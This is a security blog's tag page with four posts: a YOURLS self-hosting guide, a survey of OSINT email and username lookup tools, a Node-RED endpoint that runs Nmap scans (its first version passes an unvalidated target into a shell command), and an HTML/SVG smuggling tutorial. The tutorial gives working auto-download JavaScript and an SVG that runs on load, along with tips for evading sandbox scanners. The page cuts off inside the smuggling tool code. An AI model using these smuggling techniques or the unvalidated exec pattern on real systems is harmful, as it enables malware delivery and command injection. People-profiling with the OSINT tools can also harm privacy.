Tag: code

  • YOURLS: The Ultimate Weapon Against Long URLs

    YOURLS: The Ultimate Weapon Against Long URLs

    Introduction

    Let’s face it: long URLs are the bane of the internet. They’re unsightly, cumbersome, and frankly, nobody enjoys dealing with them. Every time I encounter a URL that stretches longer than a Monday morning, I can’t help but cringe. But here’s the silver lining: you don’t have to endure the tyranny of endless web addresses any longer. Introducing YOURLS—the ultimate weapon in your arsenal against the plague of elongated URLs!

    Imagine having the power to create your own URL shortening service, hosted right on your own domain, complete with every feature you could possibly desire. And the best part? It’s free, open-source, and infinitely customizable. So gear up, because we’re about to transform your domain into a sleek, efficient, URL-shortening powerhouse!

    The Problem with Long URLs

    Before we dive into the solution, let’s talk about why long URLs are such a headache. Not only do they look messy, but they can also be problematic when sharing links on social media, in emails, or on printed materials. Long URLs can break when sent via text message, and they’re nearly impossible to remember. They can also be a security risk, revealing sensitive query parameters. In a digital age where brevity and aesthetics matter, shortening your URLs isn’t just convenient—it’s essential.

    Meet YOURLS: Your URL Shortening Hero

    Enter YOURLS (Your Own URL Shortener), an open-source project that hands you the keys to your own URL kingdom. YOURLS lets you run your very own URL shortening service on your domain, giving you full control over your links and data. No more relying on third-party services that might go down, change their terms, or plaster your links with ads. With YOURLS, you’re in the driver’s seat.

    Why YOURLS Should Be Your Go-To URL Shortener

    YOURLS isn’t just another URL shortening tool—it’s a game-changer. Here’s why:

    • Full Control Over Your Data: Since YOURLS is self-hosted, you own all your data. No more worrying about data privacy or third-party data breaches.
    • Customizable Links: Create custom short URLs that match your branding, making your links not only shorter but also more professional and trustworthy.
    • Powerful Analytics: Get detailed insights into your link performance with historical click data, visitor geo-location, referrer tracking, and more. Understanding your audience has never been easier.
    • Developer-Friendly API: Automate your link management with YOURLS’s robust API, allowing you to integrate URL shortening into your applications seamlessly.
    • Extensible Through Plugins: With a rich plugin architecture, you can enhance YOURLS with additional features like spam protection, social sharing, and advanced analytics. Tailor the tool to fit your exact needs.

    How YOURLS Stacks Up Against Other URL Shorteners

    While YOURLS offers a fantastic solution, it’s worth considering how it compares to other popular URL shorteners out there.

    • Bitly: One of the most well-known services, Bitly offers a free plan with basic features and paid plans for advanced analytics and custom domains. However, you’re dependent on a third-party service, and your data resides on their servers.
    • TinyURL: A simple, no-frills URL shortener that’s been around for ages. It doesn’t offer analytics or customization options, making it less suitable for professional use.
    • Rebrandly: Focused on custom-branded links, Rebrandly offers advanced features but comes with a price tag. Again, your data is stored externally.
    • Short.io: Allows custom domains and offers analytics, but the free tier is limited, and you’ll need to pay for more advanced features.

    Why Choose YOURLS Over the Others?

    • Cost-Effective: YOURLS is free and open-source. No subscription fees or hidden costs.
    • Privacy and Security: Since you host it yourself, you have complete control over your data’s privacy and security.
    • Unlimited Customization: Modify and extend YOURLS to your heart’s content without any limitations imposed by third-party services.
    • Community Support: As an open-source project, YOURLS has a vibrant community that contributes plugins, support, and enhancements.

    Getting Started with YOURLS

    Now that you’re sold on YOURLS, let’s dive into how you can set it up and start conquering those unwieldy URLs.

    Step 1: Setting Up YOURLS with Docker Compose

    To make the installation process smooth and straightforward, we’ll use Docker Compose. This method ensures that all the necessary components are configured correctly and allows for easy management of your YOURLS instance. If you’re new to Docker, don’t worry—it’s simpler than you might think, and it’s a valuable tool to add to your arsenal.

    Creating the docker-compose.yml File

    The docker-compose.yml file orchestrates the services required for YOURLS to run. Here’s the template you’ll use:

    docker-compose.yml
    services:
      yourls:
        image: yourls:latest
        container_name: yourls
        ports:
          - "8081:80" # YOURLS accessible at http://localhost:8081
        environment:
          - YOURLS_SITE=https://yourdomain.com
          - YOURLS_DB_HOST=mysql-yourls
          - YOURLS_DB_USER=${YOURLS_DB_USER}
          - YOURLS_DB_PASS=${YOURLS_DB_PASS}
          - YOURLS_DB_NAME=yourls_db
          - YOURLS_USER=${YOURLS_USER}
          - YOURLS_PASS=${YOURLS_PASS}
        depends_on:
          - mysql-yourls
        volumes:
          - ./yourls_data:/var/www/html/user # Persist YOURLS data
        networks:
          - yourls-network
    
      mysql-yourls:
        image: mysql:latest
        container_name: mysql-yourls
        environment:
          - MYSQL_ROOT_PASSWORD=${MYSQL_ROOT_PASSWORD}
          - MYSQL_DATABASE=yourls_db
          - MYSQL_USER=${YOURLS_DB_USER}
          - MYSQL_PASSWORD=${YOURLS_DB_PASS}
        volumes:
          - ./mysql_data:/var/lib/mysql # Persist MySQL data
        networks:
          - yourls-network
    
    networks:
      yourls-network:
        driver: bridge

    Let’s break down what’s happening in this file:

    • Services:
    • yourls: This is the YOURLS application container. It exposes port 8081 and connects to the MySQL database.
    • mysql-yourls: The MySQL database container that stores all your URL data.
    • Environment Variables: These variables configure your YOURLS and MySQL instances. We’ll store sensitive information in a separate .env file for security.
    • Volumes: Mounts directories on your host machine to persist data even when the containers are recreated.
    • Networks: Defines a bridge network for the services to communicate securely.

    Step 2: Securing Your Credentials with an .env File

    To keep your sensitive information safe, we’ll use an .env file to store environment variables. Create a file named .env in the same directory as your docker-compose.yml file and add the following:

    Bash
    YOURLS_DB_USER=yourls_db_user
    YOURLS_DB_PASS=yourls_db_password
    YOURLS_USER=admin_username
    YOURLS_PASS=admin_password
    MYSQL_ROOT_PASSWORD=your_mysql_root_password

    Pro Tip: Generate strong passwords using the command openssl rand -base64 32. Security is paramount when running web services.

    Step 3: Launching YOURLS

    With your configuration files in place, you’re ready to bring your YOURLS instance to life. Run the following command in your terminal:

    Bash
    docker compose up -d

    This command tells Docker Compose to start your services in the background (-d for detached mode). Once the containers are up and running, you can access the YOURLS admin interface by navigating to http://yourdomain.com:8081/admin in your web browser. Log in using the credentials you specified in your .env file, and follow the setup wizard to complete the installation.

    Step 4: Securing Your YOURLS Installation with SSL

    Security should never be an afterthought. Protecting your YOURLS installation with SSL encryption ensures that data transmitted between your users and your server remains private.

    Using Let’s Encrypt for Free SSL Certificates

    • Install Certbot: The Let’s Encrypt client that automates certificate issuance.
    • Obtain a Certificate: Run certbot with appropriate options to get your SSL certificate.
    • Configure Your Reverse Proxy: Set up Nginx or Caddy to handle SSL termination.
    My Personal Setup

    I use Nginx Proxy Manager in conjunction with an Origin CA certificate from Cloudflare. This setup provides a user-friendly interface for managing SSL certificates and reverse proxy configurations. For some info on Nginx Proxy Manager check out my other post!

    Using the YOURLS API to Automate Your Workflow

    One of YOURLS’s standout features is its robust API, which allows you to integrate URL shortening into your applications, scripts, or websites. Automate link generation, expansion, and statistics retrieval without manual intervention.

    Examples of Using the YOURLS API with Bash Scripts

    Shortening a URL

    Bash
    #!/bin/bash
    
    YOURLS_API="https://yourpage.com/yourls-api.php"
    API_SIGNATURE="SECRET_SIGNATURE"
    
    # Function to shorten a URL
    shorten_url() {
    local long_url="$1"
      echo "Shortening URL: $long_url"
      curl -X GET "${YOURLS_API}?signature=${API_SIGNATURE}&action=shorturl&format=json&url=${long_url}"
    echo -e "\n"
    }
    
    shorten_url "https://example.com"

    Expanding a Short URL

    Bash
    #!/bin/bash
    
    YOURLS_API="https://yourpage.com/yourls-api.php"
    API_SIGNATURE="SECRET_SIGNATURE"
    
    # Function to expand a short URL
    expand_url() {
    local short_url="$1"
      echo "Expanding short URL: $short_url"
      curl -X GET "${YOURLS_API}?signature=${API_SIGNATURE}&action=expand&format=json&shorturl=${short_url}"
    echo -e "\n"
    }
    
    expand_url "https://yourpage.com/2"

    Retrieving URL Statistics

    Bash
    #!/bin/bash
    
    YOURLS_API="https://yourpage.com/yourls-api.php"
    API_SIGNATURE="SECRET_SIGNATURE"
    
    # Function to get URL statistics
    get_url_stats() {
    local short_url="$1"
      echo "Getting statistics for: $short_url"
      curl -X GET "${YOURLS_API}?signature=${API_SIGNATURE}&action=url-stats&format=json&shorturl=${short_url}"
    echo -e "\n"
    }
    
    get_url_stats "https://yourpage.com/2"

    Creating Short URLs with Custom Keywords

    Bash
    #!/bin/bash
    
    YOURLS_API="https://yourpage.com/yourls-api.php"
    API_SIGNATURE="SECRET_SIGNATURE"
    
    # Function to shorten a URL with a custom keyword
    shorten_url_custom_keyword() {
    local long_url="$1"
      local keyword="$2"
      echo "Shortening URL: $long_url with custom keyword: $keyword"
      curl -X GET "${YOURLS_API}?signature=${API_SIGNATURE}&action=shorturl&format=json&url=${long_url}&keyword=${keyword}"
    echo -e "\n"
    }
    
    shorten_url_custom_keyword "https://example.com" "customkeyword"

    Integrating YOURLS API in Other Languages

    While bash scripts are handy, you might prefer to use the YOURLS API with languages like Python, JavaScript, or PHP. There are libraries and examples available in various programming languages, making integration straightforward regardless of your tech stack.

    Supercharging YOURLS with Plugins

    YOURLS’s plugin architecture allows you to extend its functionality to meet your specific needs. Here are some popular plugins to consider:

    • Spam and Abuse Protection
    • reCAPTCHA: Adds Google reCAPTCHA to your public interface to prevent bots.
    • Akismet: Uses the Akismet service to filter out spam URLs.
    • Advanced Analytics
    • Clicks Counter: Provides detailed click statistics and visualizations.
    • GeoIP Tracking: Adds geographical data to your click analytics.
    • Social Media Integration
    • Share via Twitter: Adds a button to share your short links directly on Twitter.
    • Facebook Open Graph: Ensures your short links display correctly on Facebook.
    • Custom URL Keywords and Patterns
    • Random Keyword Generator: Creates more secure and hard-to-guess short URLs.
    • Reserved Keywords: Allows you to reserve certain keywords for special purposes.

    You can find a comprehensive list of plugins in the YOURLS Plugin Repository. Installing plugins is as simple as placing them in the user/plugins directory and activating them through the admin interface.

    Alternative Self-Hosted URL Shorteners

    While YOURLS is a fantastic option, it’s not the only self-hosted URL shortener available. Here are a few alternatives you might consider:

    • Polr: An open-source, minimalist URL shortener with a modern interface. Offers a robust API and can be customized with themes.
    • Kutt: A free and open-source URL shortener with advanced features like custom domains, password-protected links, and detailed statistics.
    • Shlink: A self-hosted URL shortener that provides detailed analytics, QR codes, and REST APIs.

    Each of these alternatives has its own set of features and advantages. Depending on your specific needs, one of them might be a better fit for your project. Based on my experience, YOURLS is by far the easiest and simplest option. I tried the others as well but ultimately chose it.

    Conclusion: Take Back Control of Your URLs Today

    Long URLs have overstayed their welcome, and it’s time to show them the door. With YOURLS, you have the tools to not only shorten your links but to own and control every aspect of them. No more compromises, no more third-party dependencies—just pure, unadulterated control over your online presence.

    So what are you waiting for? Join the revolution against long URLs, set up your YOURLS instance, and start sharing sleek, professional, and memorable links today!

  • Exploring OSINT Tools: From Lightweight to Powerhouse

    Exploring OSINT Tools: From Lightweight to Powerhouse

    Disclaimer:

    The information provided on this blog is for educational purposes only. The use of hacking tools discussed here is at your own risk.

    For the full disclaimer, please click here.

    Introduction

    Welcome to a journey through the exciting world of Open Source Intelligence (OSINT) tools! In this post, we’ll dive into some valuable tools, from the lightweight to the powerhouse, culminating in the grand reveal of Spiderfoot.

    The main star of this post is Spiderfoot, but before we get there, I want to show you some other more lightweight tools you might find useful.

    Holehe

    While perusing one of my favorite OSINT blogs (Oh Shint), I stumbled upon a gem to enhance my free OSINT email tool: Holehe.

    Holehe might seem like a forgotten relic to some, but its capabilities are enduring. Developed by megadose, this tool packs a punch when it comes to unearthing crucial information.

    Sherlock

    Ah, Sherlock – an old friend in my toolkit. I’ve relied on this tool for countless investigations, probably on every single one. The ability to swiftly uncover and validate your targets’ online presence is invaluable.

    Sherlock’s prowess lies in its efficiency. Developed by Sherlock Project, it’s designed to streamline the process of gathering information, making it a staple for OSINT enthusiasts worldwide.

    Introducing Holehe

    First up, let’s shine a spotlight on Holehe, a tool that might have slipped under your radar but packs a punch in the OSINT arena.

    Easy Installation

    Getting Holehe up and running is a breeze. Just follow these simple steps bewlo. I quickly hopped on my Kali test machine and installed it:

    Bash
    git clone https://github.com/megadose/holehe.git
    cd holehe/
    sudo python3 setup.py install

    I’d recommend installing it with Docker, but since I reinstall my demo Kali box every few weeks, it doesn’t matter that I globally install a bunch of Python libraries.

    Running Holehe

    Running Holehe is super simple:

    Bash
    holehe --no-clear --only-used [email protected]

    I used the --no-clear flag so I can just copy my executed command; otherwise, it clears the terminal. I use the --only-used flag because I only care about pages that my target uses.

    Let’s check out the result:

    Bash
    *********************
       [email protected]
    *********************
    [+] wordpress.com
    
    [+] Email used, [-] Email not used, [x] Rate limit, [!] Error
    121 websites checked in 10.16 seconds
    Twitter : @palenath
    Github : https://github.com/megadose/holehe
    For BTC Donations : 1FHDM49QfZX6pJmhjLE5tB2K6CaTLMZpXZ
    100%|█████████████████████████████████████████| 121/121 [00:10<00:00, 11.96it/s]

    Sweet! We have a hit! Holehe checked 121 different pages in 10.16 seconds.

    Debugging Holehe

    So running the tool without the --only-used flag is, in my opinion, important for debugging. It seems that a lot of pages rate-limited me or are throwing errors. So there is a lot of potential of missed accounts here.

    Bash
    *********************
       [email protected]
    *********************
    [x] about.me
    [-] adobe.com
    [-] amazon.com
    [x] amocrm.com
    [-] any.do
    [-] archive.org
    [x] forum.blitzortung.org
    [x] bluegrassrivals.com
    [-] bodybuilding.com
    [!] buymeacoffee.com
    
    [+] Email used, [-] Email not used, [x] Rate limit, [!] Error
    121 websites checked in 10.22 seconds

    the list is very long so I removed a lot of the output

    Personally, I think that since a lot of that code is 2 years old, many of these pages have become a lot smarter about detecting bots, which is why the rate limit gets reached.

    Holehe Deep Dive

    Let us look at how Holehe works by analyzing one of the modules. I picked Codepen.

    Please check out the code. I added some comments:

    Python
    from holehe.core import *
    from holehe.localuseragent import *
    
    
    async def codepen(email, client, out):
        name = "codepen"
        domain = "codepen.io"
        method = "register"
        frequent_rate_limit = False
    
        # adding necessary headers for codepen signup request
        headers = {
            "User-Agent": random.choice(ua["browsers"]["chrome"]),
            "Accept": "*/*",
            "Accept-Language": "en,en-US;q=0.5",
            "Referer": "https://codepen.io/accounts/signup/user/free",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
            "Origin": "https://codepen.io",
            "DNT": "1",
            "Connection": "keep-alive",
            "TE": "Trailers",
        }
    
        # getting the CSRF token for later use, adding it to the headers
        try:
            req = await client.get(
                "https://codepen.io/accounts/signup/user/free", headers=headers
            )
            soup = BeautifulSoup(req.content, features="html.parser")
            token = soup.find(attrs={"name": "csrf-token"}).get("content")
            headers["X-CSRF-Token"] = token
        except Exception:
            out.append(
                {
                    "name": name,
                    "domain": domain,
                    "method": method,
                    "frequent_rate_limit": frequent_rate_limit,
                    "rateLimit": True,
                    "exists": False,
                    "emailrecovery": None,
                    "phoneNumber": None,
                    "others": None,
                }
            )
            return None
    
        # here is where the supplied email address is added
        data = {"attribute": "email", "value": email, "context": "user"}
    
        # post request that checks if account exists
        response = await client.post(
            "https://codepen.io/accounts/duplicate_check", headers=headers, data=data
        )
    
        # checks response for specified text. If email is taken we have a hit
        if "That Email is already taken." in response.text:
            out.append(
                {
                    "name": name,
                    "domain": domain,
                    "method": method,
                    "frequent_rate_limit": frequent_rate_limit,
                    "rateLimit": False,
                    "exists": True,
                    "emailrecovery": None,
                    "phoneNumber": None,
                    "others": None,
                }
            )
        else:
            # we land here if email is not taken, meaning no account on codepen
            out.append(
                {
                    "name": name,
                    "domain": domain,
                    "method": method,
                    "frequent_rate_limit": frequent_rate_limit,
                    "rateLimit": False,
                    "exists": False,
                    "emailrecovery": None,
                    "phoneNumber": None,
                    "others": None,
                }
            )

    The developer of Holehe had to do a lot of digging. They had to manually analyze the signup flow of a bunch of different pages to build these modules. You can easily do this by using a tool like OWASP ZAP or Burp Suite or Postman. It is a lot of manual work, though.

    The issue is that flows like this often change. If Codepen changed the response message or format, this code would fail. That’s the general problem with building web scrapers. If a header name or HTML element is changed, the code fails. This sort of code is very hard to maintain. I am guessing it is why this project has been more or less abandoned.

    Nonetheless, you could easily fix the modules, and this would work perfectly again. I suggest using Python Playwright for the requests; using a headless browser is harder to detect and will probably lead to higher success.

    Sherlock

    Let me introduce you to another tool called Sherlock, which I’ve frequently used in investigations.

    Installation

    I’m just going to install it on my test system. But there’s also a Docker image I’d recommend for a production server:

    Bash
    git clone https://github.com/sherlock-project/sherlock.git
    cd sherlock
    python3 -m pip install -r requirements.txt

    Sherlock offers a plethora of options, and I recommend studying them for your specific case. It’s best used with usernames, but today, we’ll give it a try with an email address.

    Running Sherlock

    Simply run:

    Bash
    python3 sherlock [email protected]

    Sherlock takes a little bit longer than holehe, so you need a little more patience. Here are the results of my search:

    Bash
    [*] Checking username [email protected] on:
    
    [+] Archive.org: https://archive.org/details/@[email protected]
    [+] BitCoinForum: https://bitcoinforum.com/profile/[email protected]
    [+] CGTrader: https://www.cgtrader.com/[email protected]
    [+] Chaos: https://chaos.social/@[email protected]
    [+] Cults3D: https://cults3d.com/en/users/[email protected]/creations
    [+] Euw: https://euw.op.gg/summoner/[email protected]
    [+] Mapify: https://mapify.travel/[email protected]
    [+] NationStates Nation: https://nationstates.net/[email protected]
    [+] NationStates Region: https://nationstates.net/[email protected]
    [+] Oracle Community: https://community.oracle.com/people/[email protected]
    [+] Polymart: https://polymart.org/user/[email protected]
    [+] Slides: https://slides.com/[email protected]
    [+] Trello: https://trello.com/[email protected]
    [+] chaos.social: https://chaos.social/@[email protected]
    [+] mastodon.cloud: https://mastodon.cloud/@[email protected]
    [+] mastodon.social: https://mastodon.social/@[email protected]
    [+] mastodon.xyz: https://mastodon.xyz/@[email protected]
    [+] mstdn.io: https://mstdn.io/@[email protected]
    [+] social.tchncs.de: https://social.tchncs.de/@[email protected]
    
    [*] Search completed with 19 results

    At first glance, there are a lot more results. However, upon review, only 2 were valid, which is still good considering this tool is normally not used for email addresses.

    Sherlock Deep Dive

    Sherlock has a really nice JSON file that can easily be edited to add or remove old tools. You can check it out sherlock/resources/data.json.

    This makes it a lot easier to maintain. I use the same approach for my OSINT tools here on this website.

    This is what one of Sherlock’s modules looks like:

    JSON
      "Docker Hub": {
        "errorType": "status_code",
        "url": "https://hub.docker.com/u/{}/",
        "urlMain": "https://hub.docker.com/",
        "urlProbe": "https://hub.docker.com/v2/users/{}/",
        "username_claimed": "blue"
      },

    There’s not much more to it; they basically use these “templates” and test the responses they get from requests sent to the respective endpoints. Sometimes by matching text, sometimes by using regex.

    Spiderfoot

    Now we get to the star of the show: Spiderfoot. I love Spiderfoot. I use it on every engagement, usually only in Passive mode with just about all the API Keys that are humanly affordable. The only thing I do not like about it is that it actually finds so much information that it takes a while to sort through the data and filter out false positives or irrelevant data. Playing around with the settings can drastically reduce this.

    Installation

    Spiderfoot is absolutely free and even without API Keys for other services, it finds a mind-boggling amount of information. It has saved me countless hours on people investigations, you would not believe it.

    You can find the installation instructions on the Spiderfoot GitHub page. There are also Docker deployments available for this. In my case, it is already pre-installed on Kali, so I just need to start it.

    Bash
    spiderfoot -l 0.0.0.0:8081

    This starts the Spiderfoot webserver, and I can reach it from my network on the IP of my Kali machine on port 8081. In my case, that would be http://10.102.0.11:8081/.

    After you navigate to the address, you will be greeted with this screen:

    I run a headless Kali, so I just SSH into my Kali “server.” If you are following along, you can simply run spiderfoot -l 127.0.0.1:8081 and only expose it on localhost, then browse there on your Kali Desktop.

    Running Spiderfoot

    Spiderfoot is absolutely killer when you add as many of the API Keys as possible. A lot of them are for free. Just export the Spiderfoot.cfg from the settings page, fill in the keys, then import them.

    Important: before you begin, check the settings. Things like port scans are enabled by default. Your target will know you are scanning them. By default, this is not a passive recon tool like the others. You can disable them OR just run Spiderfoot in Passive mode when you configure a new scan.

    My initial scan did not find many infos, that’s good. The email address I supplied should be absolutely clean. I did want to show you some results, so I started another search with my karlcom.de domain, which is my consulting company.

    By the time the scan was done, it had found over 2000 results linking Karlcom to Exploit and a bunch of other businesses and websites I run. It found my clear name and a whole bunch of other interesting information about what I do on the internet and how things are connected. All that just by putting my domain in without ANY API keys. That is absolutely nuts.

    You get a nice little correlation report at the end (you do not really need to see all the things in detail here):

    Once you start your own Spiderfoot journey, you will have more than enough time to study the results there and see them as big as you like.

    Another thing I did not show you was the “Browse” option. While a scan is running, you can view the results in the web front end and already check for possible other attack vectors or information.

    Summary

    So, what did we accomplish on our OSINT adventure? We took a spin through some seriously cool tools! From the nifty Holehe to the trusty Sherlock and the mighty Spiderfoot, each tool brings its own flair to the table. Whether you’re sniffing out secrets or just poking around online, these tools have your back. With their easy setups and powerful features, Holehe, Sherlock, and Spiderfoot are like the trusty sidekicks you never knew you needed in the digital world.

    Keep exploring, stay curious, and until next time!

  • Node-RED, building Nmap as a Service

    Node-RED, building Nmap as a Service

    Introduction

    In the realm of cybersecurity, automation is not just a convenience but a necessity. Having a tool that can effortlessly construct endpoints and interconnect various security tools can revolutionize your workflow. Today, I’m excited to introduce you to Node-RED, a powerhouse for such tasks.

    This is part of a series of hacking tools automated with Node-RED.

    Setup

    While diving into the intricacies of setting up a Kali VM with Node-RED is beyond the scope of this blog post, I’ll offer some guidance to get you started.

    Base OS

    To begin, you’ll need a solid foundation, which is where Kali Linux comes into play. Whether you opt for a virtual machine setup or use it as the primary operating system for your Raspberry Pi, the choice is yours.

    Running Node-RED

    Once you’ve got Kali Linux up and running, the next step is to install Node-RED directly onto your machine, NOT in a Docker container since you will ned root access to the host system. Follow the installation guide provided by the Node-RED team.

    To ensure seamless operation, I highly recommend configuring Node-RED to start automatically at boot. One effective method to achieve this is by utilizing PM2.

    By following these steps, you’ll have Node-RED set up and ready to streamline your cybersecurity automation tasks.

    Nmap as a Service

    In this section, we’ll create a web service that executes Nmap scans, accessible via a URL like so: http://10.10.0.11:8080/api/v1/nmap?target=exploit.to (Note: Your IP, port, and target will differ).

    Building the Flow

    To construct this service, we’ll need to assemble the following nodes:

    • HTTP In
    • Function
    • Exec
    • Template
    • HTTP Response

    That’s all it takes.

    You can define any path you prefer for the HTTP In node. In my setup, it’s /api/v1/nmap.

    The function node contains the following JavaScript code:

    JavaScript
    msg.scan_options = "-sS -Pn -T3";
    msg.scan_target = msg.payload.target;
    
    msg.payload = msg.scan_options + " " + msg.scan_target;
    return msg;

    It’s worth noting that this scan needs to be run as a root user due to the -sS flag (learn more here). The msg.payload.target parameter holds the ?target= value. While in production, it’s crucial to filter and validate input (e.g., domain or IP), for local testing, it suffices.

    The Exec node is straightforward:

    It simply executes Nmap and appends the msg.payload from the previous function node. So, in this example, it results in:

    Bash
    nmap -sS -Pn -T3 exploit.to

    The Template node formats the result for web display using Mustache syntax:

    <pre>
    {{payload}}
    </pre>

    Finally, the HTTP Response node sends the raw Nmap output back to the browser. It’s important to note that this setup isn’t suitable for extensive Nmap scans that take a while, as the browser may timeout while waiting for the response to load.

    You now have a basic Nmap as a Service.

    TODO

    You can go anywhere from here, but I would suggest:

    •  add validation to the endpoint
    •  add features to supply custom nmap flags
    •  stream result to browser via websocket
    •  save output to database or file and poll another endpoint to check if done
    •  format output for web (either greppable nmap or xml)
    •  ChatOps (Discord, Telegram bot)

    Edit 1:

    I ended up adding validation for domain and IPv4. I also modified the target variable. It is now msg.target vs. msg.payload.target.

    JavaScript
    function validateDomain(domain) {
      var domainRegex = /^(?!:<strong>\/\/</strong>)([a-zA-Z0-9-]+<strong>\.</strong>)+[a-zA-Z]{2,}$/;
      return domainRegex.test(domain);
    }
    
    function validateIPv4(ipv4) {
      var ipv4Regex =
        /^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)<strong>\.</strong>(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)<strong>\.</strong>(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)<strong>\.</strong>(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/;
      return ipv4Regex.test(ipv4);
    }
    
    if (validateDomain(msg.payload.target) || validateIPv4(msg.payload.target)) {
      msg.passed = true;
      msg.target = msg.payload.target;
      return msg;
    }
    
    msg.passed = false;
    return msg;
    

    The flow now looks like this, and checks the msg.passed. If it is false then it returns a HTTP 400 Bad Request, else it starts the Nmap scan.

  • Unveiling HTML and SVG Smuggling

    Unveiling HTML and SVG Smuggling

    Disclaimer:

    The information provided on this blog is for educational purposes only. The use of hacking tools discussed here is at your own risk.

    For the full disclaimer, please click here.

    Introduction

    Welcome to the world of cybersecurity, where adversaries are always one step ahead, cooking up new ways to slip past our defenses. One technique that’s been causing quite a stir among hackers is HTML and SVG smuggling. It’s like hiding a wolf in sheep’s clothing—using innocent-looking files to sneak in malicious payloads without raising any alarms.

    Understanding the Technique

    HTML and SVG smuggling is all about exploiting the blind trust we place in web content. We see HTML and SVG files as harmless buddies, used for building web pages and creating graphics. But little do we know, cybercriminals are using them as Trojan horses, hiding their nasty surprises inside these seemingly friendly files.

    How It Works

    So, how does this digital sleight of hand work? Well, it’s all about embedding malicious scripts or payloads into HTML or SVG files. Once these files are dressed up and ready to go, they’re hosted on legitimate websites or sent through seemingly harmless channels like email attachments. And just like that, attackers slip past our defenses, like ninjas in the night.

    Evading Perimeter Protections

    Forget about traditional attack methods that rely on obvious malware signatures or executable files. HTML and SVG smuggling flies under the radar of many perimeter defenses. By camouflaging their malicious payloads within innocent-looking web content, attackers can stroll right past firewalls, intrusion detection systems (IDS), and other security guards without breaking a sweat.

    Implications for Security

    The implications of HTML and SVG smuggling are serious business. It’s a wake-up call for organizations to beef up their security game with a multi-layered approach. But it’s not just about installing fancy software—it’s also about educating users and keeping them on their toes. With hackers getting sneakier by the day, we need to stay one step ahead to keep our digital fortresses secure.

    The Battle Continues

    In the ever-evolving world of cybersecurity, HTML and SVG smuggling are the new kids on the block, posing a serious challenge for defenders. But fear not, fellow warriors! By staying informed, adapting our defenses, and collaborating with our peers, we can turn the tide against these digital infiltrators. So let’s roll up our sleeves and get ready to face whatever challenges come our way.

    Enough theory and talk, let us get dirty ! 🏴‍☠️

    Being malicious

    At this point I would like to remind you of my Disclaimer, again 😁.

    I prepared a demo using a simple Cloudflare Pages website, the payload being downlaoded is an EICAR test file.

    Here is the Page: HTML Smuggling Demo <- Clicking this will download an EICAR test file onto your computer, if you read the Wikipedia article above you understand that this could trigger your Anti-Virus (it should).

    Here is the code (i cut part of the payload out or it would get too big):

    <body>
      <script>
        function base64ToArrayBuffer(base64) {
          var binary_string = window.atob(base64);
          var len = binary_string.length;
    
          var bytes = new Uint8Array(len);
          for (var i = 0; i < len; i++) {
            bytes[i] = binary_string.charCodeAt(i);
          }
          return bytes.buffer;
        }
    
        var file = "BASE64_ENCODED_PAYLOAD";
        var data = base64ToArrayBuffer(file);
        var blob = new Blob([data], { type: "octet/stream" });
        var fileName = "eicar.com";
    
        if (window.navigator.msSaveOrOpenBlob) {
          window.navigator.msSaveOrOpenBlob(blob, fileName);
        } else {
          var a = document.createElement("a");
          console.log(a);
          document.body.appendChild(a);
          a.style = "display: none";
          var url = window.URL.createObjectURL(blob);
          a.href = url;
          a.download = fileName;
          a.click();
          window.URL.revokeObjectURL(url);
        }
      </script>
    </body>

    This will create an auto clicked link on the page, which looks like this:

    <a href="blob:https://2cdcc148.fck-vp.pages.dev/dbadccf2-acf1-41be-b9b7-7db8e7e6b880" download="eicar.com" style="display: none;"></a

    This HTML smuggling at its most basic. Just take any file, encode it in base64, and insert the result into var file = "BASE64_ENCODED_PAYLOAD";. Easy peasy, right? But beware, savvy sandbox-based systems can sniff out these tricks. To outsmart them, try a little sleight of hand. Instead of attaching the encoded HTML directly to an email, start with a harmless-looking link. Then, after a delay, slip in the “payloaded” HTML. It’s like sneaking past security with a disguise. This delay buys you time for a thorough scan, presenting a clean, innocent page to initial scanners.

    By playing it smart, you up your chances of slipping past detection and hitting your target undetected. But hey, keep in mind, not every tactic works every time. Staying sharp and keeping up with security measures is key to staying one step ahead of potential threats.

    Advanced Smuggling

    If you’re an analyst reading this, you’re probably yawning at the simplicity of my example. I mean, come on, spotting that massive base64 string in the HTML is child’s play for you, right? But fear not, there are some nifty tweaks to spice up this technique. For instance, ever thought of injecting your code into an SVG?

    <svg
      xmlns="http://www.w3.org/2000/svg"
      xmlns:xlink="http://www.w3.org/1999/xlink"
      version="1.0"
      width="100"
      height="100"
    >
      <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
      <script>
        <![CDATA[document.addEventListener("DOMContentLoaded",function(){function base64ToArrayBuffer(base64){var binary_string=atob(base64);var len=binary_string.length;var bytes=new Uint8Array(len);for(var i=0;i<em><</em>len;i++){bytes[i]=binary_string.charCodeAt(i);}return bytes.buffer;}var file='BASE64_PAYLOAD_HERE';var data=base64ToArrayBuffer(file);var blob=new Blob([data],{type:'octet/stream'});var fileName='karl.webp';var a=document.createElementNS('http://www.w3.org/1999/xhtml','a');document.documentElement.appendChild(a);a.setAttribute('style','display:none');var url=window.URL.createObjectURL(blob);a.href=url;a.download=fileName;a.click();window.URL.revokeObjectURL(url);});]]>
      </script>
    </svg>

    You can stash the SVG in a CDN and have it loaded at the beginning of your page. It’s a tad more sophisticated, right? Just a tad.

    Now, I can’t take credit for this genius idea. Nope, the props go to Surajpkhetani, his tool also gave me the idea for this post. I decided to put my own spin on it and rewrote his AutoSmuggle Tool in JavaScript. Why? Well, just because I can. I mean, I could have gone with Python or Go… and who knows, maybe I will someday. But for now, here’s the JavaScript code:

    const fs = require("fs");
    
    function base64Encode(plainText) {
      return Buffer.from(plainText).toString("base64");
    }
    
    function svgSmuggle(b64String, filename) {
      const obfuscatedB64 = b64String;
